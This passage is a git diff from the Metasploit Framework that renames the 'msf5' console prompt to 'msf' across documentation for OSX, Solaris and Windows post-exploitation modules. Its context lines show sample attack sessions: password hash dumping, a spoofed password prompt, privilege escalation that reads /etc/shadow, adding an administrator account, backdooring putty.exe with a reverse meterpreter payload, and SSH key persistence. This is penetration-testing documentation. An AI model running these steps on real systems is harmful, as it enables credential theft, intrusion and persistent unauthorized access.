OSX 10.14.4 ``` -msf5 post(osx/gather/hashdump) > run +msf post(osx/gather/hashdump) > run [*] Attempting to grab shadow for user nobody... [*] Attempting to grab shadow for user h00die... diff --git a/documentation/modules/post/osx/gather/password_prompt_spoof.md b/documentation/modules/post/osx/gather/password_prompt_spoof.md index 22f78cad6a..b83c035e1b 100644 --- a/documentation/modules/post/osx/gather/password_prompt_spoof.md +++ b/documentation/modules/post/osx/gather/password_prompt_spoof.md @@ -33,7 +33,7 @@ allow permission for the prompt to be displayed. See Scenarios for additional d If the user does not complete the prompt in time, or does not enable permissions to receive the prompt: ``` -msf5 post(osx/gather/password_prompt_spoof) > run +msf post(osx/gather/password_prompt_spoof) > run [*] Running module against MacBook-Pro.nogroup [*] Waiting for user 'h00die' to enter credentials... @@ -45,7 +45,7 @@ msf5 post(osx/gather/password_prompt_spoof) > run If the user DOES complete the prompt in time: ``` -msf5 post(osx/gather/password_prompt_spoof) > run +msf post(osx/gather/password_prompt_spoof) > run [*] Running module against MacBook-Pro.nogroup [*] Waiting for user 'h00die' to enter credentials... diff --git a/documentation/modules/post/osx/gather/vnc_password_osx.md b/documentation/modules/post/osx/gather/vnc_password_osx.md index 526ad7c521..bdba512ae6 100644 --- a/documentation/modules/post/osx/gather/vnc_password_osx.md +++ b/documentation/modules/post/osx/gather/vnc_password_osx.md @@ -23,14 +23,14 @@ System Preferences > Sharing > Screen Sharing > Computer Settings Typical run against an OSX session, with the vnc service activated: ``` -msf5 exploit(multi/handler) > use post/osx/gather/vnc_password_osx -msf5 post(osx/gather/vnc_password_osx) > set SESSION 1 +msf exploit(multi/handler) > use post/osx/gather/vnc_password_osx +msf post(osx/gather/vnc_password_osx) > set SESSION 1 SESSION => 1 -msf5 post(osx/gather/vnc_password_osx) > exploit +msf post(osx/gather/vnc_password_osx) > exploit [*] Checking VNC Password... [+] Password Found: PoCpassw [+] Password data stored as loot in: .msf4/loot/20181002142527_default_10.0.2.15_osx.vnc.password_371610.txt [*] Post module execution completed -msf5 post(osx/gather/vnc_password_osx) > +msf post(osx/gather/vnc_password_osx) > ``` diff --git a/documentation/modules/post/osx/manage/sonic_pi.md b/documentation/modules/post/osx/manage/sonic_pi.md index a920661020..1cfd2714d4 100644 --- a/documentation/modules/post/osx/manage/sonic_pi.md +++ b/documentation/modules/post/osx/manage/sonic_pi.md @@ -54,7 +54,7 @@ default. ## Usage ``` -msf5 post(osx/manage/sonic_pi) > options +msf post(osx/manage/sonic_pi) > options Module options (post/osx/manage/sonic_pi): @@ -74,7 +74,7 @@ Post action: Run Run Sonic Pi code -msf5 post(osx/manage/sonic_pi) > advanced +msf post(osx/manage/sonic_pi) > advanced Module advanced options (post/osx/manage/sonic_pi): @@ -85,7 +85,7 @@ Module advanced options (post/osx/manage/sonic_pi): VERBOSE true no Enable detailed status messages WORKSPACE no Specify the workspace for this module -msf5 post(osx/manage/sonic_pi) > show actions +msf post(osx/manage/sonic_pi) > show actions Post actions: @@ -95,21 +95,21 @@ Post actions: Stop Stop all jobs -msf5 post(osx/manage/sonic_pi) > set session -1 +msf post(osx/manage/sonic_pi) > set session -1 session => -1 -msf5 post(osx/manage/sonic_pi) > run +msf post(osx/manage/sonic_pi) > run [+] Sonic Pi is running [*] Running Sonic Pi code: /rapid7/metasploit-framework/data/post/sonic_pi_example.rb [*] echo [snip] | base64 -D | /Applications/Sonic\ Pi.app/server/native/ruby/bin/ruby [*] Post module execution completed -msf5 post(osx/manage/sonic_pi) > set action Stop +msf post(osx/manage/sonic_pi) > set action Stop action => Stop -msf5 post(osx/manage/sonic_pi) > run +msf post(osx/manage/sonic_pi) > run [+] Sonic Pi is running [*] Stopping all jobs [*] echo [snip] | base64 -D | /Applications/Sonic\ Pi.app/server/native/ruby/bin/ruby [*] Post module execution completed -msf5 post(osx/manage/sonic_pi) > +msf post(osx/manage/sonic_pi) > ``` diff --git a/documentation/modules/post/solaris/escalate/pfexec.md b/documentation/modules/post/solaris/escalate/pfexec.md index b361623fd4..4e744de50d 100644 --- a/documentation/modules/post/solaris/escalate/pfexec.md +++ b/documentation/modules/post/solaris/escalate/pfexec.md @@ -34,26 +34,26 @@ ## Scenarios ``` - msf5 > use post/solaris/escalate/pfexec - msf5 post(solaris/escalate/pfexec) > sessions -i 1 -c id + msf > use post/solaris/escalate/pfexec + msf post(solaris/escalate/pfexec) > sessions -i 1 -c id [*] Running 'id' on shell session 1 (172.16.191.221) uid=100(user) gid=10(staff) - msf5 post(solaris/escalate/pfexec) > set verbose true + msf post(solaris/escalate/pfexec) > set verbose true verbose => true - msf5 post(solaris/escalate/pfexec) > set session 1 + msf post(solaris/escalate/pfexec) > set session 1 session => 1 - msf5 post(solaris/escalate/pfexec) > run + msf post(solaris/escalate/pfexec) > run [*] Trying pfexec as `user' ... [*] uid=0(root) gid=0(root) [+] Success! Upgrading session ... [+] Success! root shell secured [*] Post module execution completed - msf5 post(solaris/escalate/pfexec) > sessions -i 1 -c id + msf post(solaris/escalate/pfexec) > sessions -i 1 -c id [*] Running 'id' on shell session 1 (172.16.191.221) uid=0(root) gid=0(root) - msf5 post(solaris/escalate/pfexec) > + msf post(solaris/escalate/pfexec) > ``` diff --git a/documentation/modules/post/solaris/escalate/srsexec_readline.md b/documentation/modules/post/solaris/escalate/srsexec_readline.md index c3741db5b0..741ea9034b 100644 --- a/documentation/modules/post/solaris/escalate/srsexec_readline.md +++ b/documentation/modules/post/solaris/escalate/srsexec_readline.md @@ -39,7 +39,7 @@ ### Solaris 10 u9 with mock binary and python 2.4 ``` -msf5 post(solaris/escalate/srsexec_readline) > run +msf post(solaris/escalate/srsexec_readline) > run [+] 3.2.4 is vulnerable [+] Raw Command Output: verify_binary(vFYZf) @@ -53,7 +53,7 @@ see SYSLOG(/var/adm/messages) for errors [+] First line of /etc/shadow: root:MW7h.vpI1Kq1g:17599:::::: [+] Adding root's hash to the credential database. [*] Post module execution completed -msf5 post(solaris/escalate/srsexec_readline) > creds +msf post(solaris/escalate/srsexec_readline) > creds Credentials =========== diff --git a/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md b/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md index ebd3506da8..453149aaec 100644 --- a/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md +++ b/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md @@ -65,7 +65,7 @@ C:\Users\msfuser\Downloads>exit exit meterpreter > background [*] Backgrounding session 1... -msf5 post(windows/escalate/unmarshal_cmd_exec) > show options +msf post(windows/escalate/unmarshal_cmd_exec) > show options Module options (post/windows/escalate/unmarshal_cmd_exec): @@ -77,11 +77,11 @@ Module options (post/windows/escalate/unmarshal_cmd_exec): SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default). SESSION yes The session to run this module on. -msf5 post(windows/escalate/unmarshal_cmd_exec) > set command 'net user /add egypt h@ks4shellz & net localgroup administrators /add egypt' +msf post(windows/escalate/unmarshal_cmd_exec) > set command 'net user /add egypt h@ks4shellz & net localgroup administrators /add egypt' command => net user /add egypt h@ks4shellz & net localgroup administrators /add egypt -msf5 post(windows/escalate/unmarshal_cmd_exec) > set verbose true +msf post(windows/escalate/unmarshal_cmd_exec) > set verbose true verbose => true -msf5 post(windows/escalate/unmarshal_cmd_exec) > run +msf post(windows/escalate/unmarshal_cmd_exec) > run [!] SESSION may not be compatible with this module. [*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1 @@ -113,7 +113,7 @@ Call: MarshalInterface [*] C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct already exists on the target. Deleting... [*] Deleted C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct [*] Post module execution completed -msf5 post(windows/escalate/unmarshal_cmd_exec) > sessions -i -1 +msf post(windows/escalate/unmarshal_cmd_exec) > sessions -i -1 [*] Starting interaction with 1... meterpreter > execute -f cmd.exe -i -H diff --git a/documentation/modules/post/windows/gather/avast_memory_dump.md b/documentation/modules/post/windows/gather/avast_memory_dump.md index 16387088bb..70e574e28d 100644 --- a/documentation/modules/post/windows/gather/avast_memory_dump.md +++ b/documentation/modules/post/windows/gather/avast_memory_dump.md @@ -32,7 +32,7 @@ Specify the location to write the memory dump to. ### Windows 10 (2004 OS Build 19041.572) ``` -msf5 > search avast +msf > search avast Matching Modules ================ @@ -42,9 +42,9 @@ Matching Modules 0 post/windows/gather/avast_memory_dump normal No Avast AV Memory Dumping Utility -msf5 > use 0 +msf > use 0 -msf5 post(windows/gather/avast_memory_dump) > sessions -C 'ps -N notepad.exe' +msf post(windows/gather/avast_memory_dump) > sessions -C 'ps -N notepad.exe' [*] Running 'ps -N notepad.exe' on meterpreter session 4 (192.168.218.131) Filtering on 'notepad.exe' @@ -55,7 +55,7 @@ Process List --- ---- ---- ---- ------- ---- ---- 8504 1812 notepad.exe x64 1 DESKTOP-CD2VHVO\user C:\Windows\System32\notepad.exe -msf5 post(windows/gather/avast_memory_dump) > show options +msf post(windows/gather/avast_memory_dump) > show options Module options (post/windows/gather/avast_memory_dump): @@ -65,13 +65,13 @@ Module options (post/windows/gather/avast_memory_dump): PID 8504 yes specify pid to dump SESSION 4 yes The session to run this module on. -msf5 post(windows/gather/avast_memory_dump) > set PID 8504 +msf post(windows/gather/avast_memory_dump) > set PID 8504 PID => 8504 -msf5 post(windows/gather/avast_memory_dump) > set SESSION 4 +msf post(windows/gather/avast_memory_dump) > set SESSION 4 SESSION => 4 -msf5 post(windows/gather/avast_memory_dump) > run +msf post(windows/gather/avast_memory_dump) > run [*] [2020.10.21-22:49:24] AvDump.exe exists! [*] [2020.10.21-22:49:24] executing Avast mem dump utility against 8504 to C:\Users\Public\test.dmp diff --git a/documentation/modules/post/windows/gather/bloodhound.md b/documentation/modules/post/windows/gather/bloodhound.md index 24503aaeeb..433a181b5c 100644 --- a/documentation/modules/post/windows/gather/bloodhound.md +++ b/documentation/modules/post/windows/gather/bloodhound.md @@ -126,9 +126,9 @@ Logged On Users : 7 Meterpreter : x86/windows meterpreter > background [*] Backgrounding session 1... -msf5 post(windows/gather/bloodhound) > set method disk +msf post(windows/gather/bloodhound) > set method disk method => disk -msf5 post(windows/gather/bloodhound) > exploit +msf post(windows/gather/bloodhound) > exploit [*] Uploading sharphound.exe as C:\Users\user\Desktop\qehojlwml.exe [*] Loading BloodHound with: . C:\Users\user\Desktop\qehojlwml.exe --outputdirectory "C:\Users\user\AppData\Local\Temp" --zipfilename eiqxerh --encryptzip --nosavecache @@ -157,7 +157,7 @@ powershell.exe -EncodedCommand LgAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAYQByAGEAXABEAGUAc [*] Deleting C:\Users\user\Desktop\qehojlwml.exe [*] Post module execution completed -msf5 post(windows/gather/bloodhound) > notes +msf post(windows/gather/bloodhound) > notes Notes ===== diff --git a/documentation/modules/post/windows/gather/credentials/purevpn_cred_collector.md b/documentation/modules/post/windows/gather/credentials/purevpn_cred_collector.md index 98ab1e49ec..918f4b4362 100644 --- a/documentation/modules/post/windows/gather/credentials/purevpn_cred_collector.md +++ b/documentation/modules/post/windows/gather/credentials/purevpn_cred_collector.md @@ -20,7 +20,7 @@ directory of PureVPN. # Demo ``` -msf5 post(windows/gather/credentials/purevpn_cred_collector) > rerun +msf post(windows/gather/credentials/purevpn_cred_collector) > rerun [*] Reloading module... [*] Searching PureVPN Client installation at C:\ProgramData diff --git a/documentation/modules/post/windows/gather/phish_windows_credentials.md b/documentation/modules/post/windows/gather/phish_windows_credentials.md index abba7e2e0c..391e6a1a9d 100644 --- a/documentation/modules/post/windows/gather/phish_windows_credentials.md +++ b/documentation/modules/post/windows/gather/phish_windows_credentials.md @@ -39,9 +39,9 @@ msf > use post/windows/gather/phish_windows_credentials msf post(windows/gather/phish_windows_credentials) > set SESSION 1 SESSION => 1 - msf5 post(windows/gather/phish_windows_credentials) > set PROCESS * + msf post(windows/gather/phish_windows_credentials) > set PROCESS * PROCESS => * - msf5 post(windows/gather/phish_windows_credentials) > exploit + msf post(windows/gather/phish_windows_credentials) > exploit [+] PowerShell is installed. [*] Monitoring new processes. diff --git a/documentation/modules/post/windows/manage/execute_dotnet_assembly.md b/documentation/modules/post/windows/manage/execute_dotnet_assembly.md index ba8765e46c..196a2f610d 100644 --- a/documentation/modules/post/windows/manage/execute_dotnet_assembly.md +++ b/documentation/modules/post/windows/manage/execute_dotnet_assembly.md @@ -33,7 +33,7 @@ You'll find details at [Execute assembly via Meterpreter session](https://b4rtik 1. The assembly should run. ``` -msf5 post(windows/manage/execute_dotnet_assembly) > run +msf post(windows/manage/execute_dotnet_assembly) > run [*] Launching notepad.exe to host CLR... [+] Process 10628 launched. @@ -151,4 +151,4 @@ Module options (post/windows/manage/execute_dotnet_assembly): ---- --------------- -------- ----------- KILL true yes Kill the launched process at the end of the task -``` \ No newline at end of file +``` diff --git a/documentation/modules/post/windows/manage/install_python.md b/documentation/modules/post/windows/manage/install_python.md index fb44566e74..0544e54ebf 100644 --- a/documentation/modules/post/windows/manage/install_python.md +++ b/documentation/modules/post/windows/manage/install_python.md @@ -47,20 +47,20 @@ This module has been tested against: Get initial access: Create a Meterpreter exe using msfvenom, then transfer it to the target system via web server, SMB, etc. Execute the payload to get a session. - msf5 > handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp + msf > handler -H 0.0.0.0 -P 4444 -p windows/meterpreter/reverse_tcp [*] Payload handler running as background job 0. [*] Started reverse TCP handler on 0.0.0.0:4444 - msf5 > + msf > [*] Sending stage (180291 bytes) to 192.168.13.129 [*] Meterpreter session 1 opened (192.168.13.130:4444 -> 192.168.13.129:50069) at 2020-03-04 20:32:59 -0500 Use the post module to install Python on the target filesystem - msf5 > use post/windows/manage/install_python - msf5 post(windows/manage/install_python) > set SESSION 1 + msf > use post/windows/manage/install_python + msf post(windows/manage/install_python) > set SESSION 1 SESSION => 1 - msf5 post(windows/manage/install_python) > exploit + msf post(windows/manage/install_python) > exploit [*] Downloading Python embeddable zip from https://www.python.org/ftp/python/3.8.2/python-3.8.2-embed-win32.zip [+] Compressed size: 1112 @@ -73,7 +73,7 @@ Use the post module to install Python on the target filesystem Verify Python works - msf5 post(windows/manage/install_python) > sessions -i 1 + msf post(windows/manage/install_python) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell diff --git a/documentation/modules/post/windows/manage/install_ssh.md b/documentation/modules/post/windows/manage/install_ssh.md index 643166342b..43cbecee0c 100644 --- a/documentation/modules/post/windows/manage/install_ssh.md +++ b/documentation/modules/post/windows/manage/install_ssh.md @@ -35,10 +35,10 @@ Versions prior to Windows 10 are not supported. ### Install OpenSSH on Windows ``` - msf5 > use post/windows/manage/install_ssh - msf5 post(windows/manage/install_ssh) > set SESSION 1 + msf > use post/windows/manage/install_ssh + msf post(windows/manage/install_ssh) > set SESSION 1 SESSION => 1 - msf5 post(windows/manage/install_ssh) > exploit + msf post(windows/manage/install_ssh) > exploit [*] Installing OpenSSH.Server [*] Installing OpenSSH.Client @@ -51,18 +51,18 @@ When combined with capabilities such as SSH forwarding, SSH on Windows can provi ### Uninstall OpenSSH on Windows ``` - msf5 > use post/windows/manage/install_ssh - msf5 post(windows/manage/install_ssh) > set SESSION 1 + msf > use post/windows/manage/install_ssh + msf post(windows/manage/install_ssh) > set SESSION 1 SESSION => 1 - msf5 post(windows/manage/install_ssh) > set INSTALL_CLIENT false + msf post(windows/manage/install_ssh) > set INSTALL_CLIENT false INSTALL_CLIENT => false - msf5 post(windows/manage/install_ssh) > set INSTALL_SERVER false + msf post(windows/manage/install_ssh) > set INSTALL_SERVER false INSTALL_SERVER => false - msf5 post(windows/manage/install_ssh) > set UNINSTALL_CLIENT true + msf post(windows/manage/install_ssh) > set UNINSTALL_CLIENT true UNINSTALL_CLIENT => true - msf5 post(windows/manage/install_ssh) > set UNINSTALL_SERVER true + msf post(windows/manage/install_ssh) > set UNINSTALL_SERVER true UNINSTALL_SERVER => true - msf5 post(windows/manage/install_ssh) > exploit + msf post(windows/manage/install_ssh) > exploit [*] Uninstalling OpenSSH.Server [*] Uninstalling OpenSSH.Client diff --git a/documentation/modules/post/windows/manage/peinjector.md b/documentation/modules/post/windows/manage/peinjector.md index 7bd7e3ec5e..41521784e7 100644 --- a/documentation/modules/post/windows/manage/peinjector.md +++ b/documentation/modules/post/windows/manage/peinjector.md @@ -49,8 +49,8 @@ Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1... -msf5 exploit(multi/handler) > use post/windows/manage/peinjector -msf5 post(windows/manage/peinjector) > show options +msf exploit(multi/handler) > use post/windows/manage/peinjector +msf post(windows/manage/peinjector) > show options Module options (post/windows/manage/peinjector): @@ -63,17 +63,17 @@ Module options (post/windows/manage/peinjector): SESSION yes The session to run this module on. TARGETPE no Path of the target executable to be injected -msf5 post(windows/manage/peinjector) > set lhost 192.168.135.111 +msf post(windows/manage/peinjector) > set lhost 192.168.135.111 lhost => 192.168.135.111 -msf5 post(windows/manage/peinjector) > set lport 4561 +msf post(windows/manage/peinjector) > set lport 4561 lport => 4561 -msf5 post(windows/manage/peinjector) > set payload windows/x64/meterpreter/reverse_https +msf post(windows/manage/peinjector) > set payload windows/x64/meterpreter/reverse_https payload => windows/x64/meterpreter/reverse_https -msf5 post(windows/manage/peinjector) > set session 1 +msf post(windows/manage/peinjector) > set session 1 session => 1 -msf5 post(windows/manage/peinjector) > set targetpe 'C:\users\msfuser\downloads\puttyx64.exe' +msf post(windows/manage/peinjector) > set targetpe 'C:\users\msfuser\downloads\puttyx64.exe' targetpe => C:\users\msfuser\downloads\puttyx64.exe -msf5 post(windows/manage/peinjector) > show options +msf post(windows/manage/peinjector) > show options Module options (post/windows/manage/peinjector): @@ -86,13 +86,13 @@ Module options (post/windows/manage/peinjector): SESSION 1 yes The session to run this module on. TARGETPE C:\users\msfuser\downloads\puttyx64.exe no Path of the target executable to be injected -msf5 post(windows/manage/peinjector) > run +msf post(windows/manage/peinjector) > run [*] Running module against WIN10X64-1511 [*] Generating payload [*] Injecting Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) into the executable C:\users\msfuser\downloads\puttyx64.exe [+] Successfully injected payload into the executable: C:\users\msfuser\downloads\puttyx64.exe [*] Post module execution completed -msf5 post(windows/manage/peinjector) > +msf post(windows/manage/peinjector) > ``` diff --git a/documentation/modules/post/windows/manage/sshkey_persistence.md b/documentation/modules/post/windows/manage/sshkey_persistence.md index 41fba9bf2b..5234847ca5 100644 --- a/documentation/modules/post/windows/manage/sshkey_persistence.md +++ b/documentation/modules/post/windows/manage/sshkey_persistence.md @@ -67,7 +67,7 @@ Use the post module to write the ssh key SESSION => 1 msf post(sshkey_persistence) > set CREATESSHFOLDER true CreateSSHFolder => true - msf5 post(windows/manage/sshkey_persistence) > run + msf post(windows/manage/sshkey_persistence) > run [*] Checking SSH Permissions [*] Authorized Keys File: .ssh/authorized_keys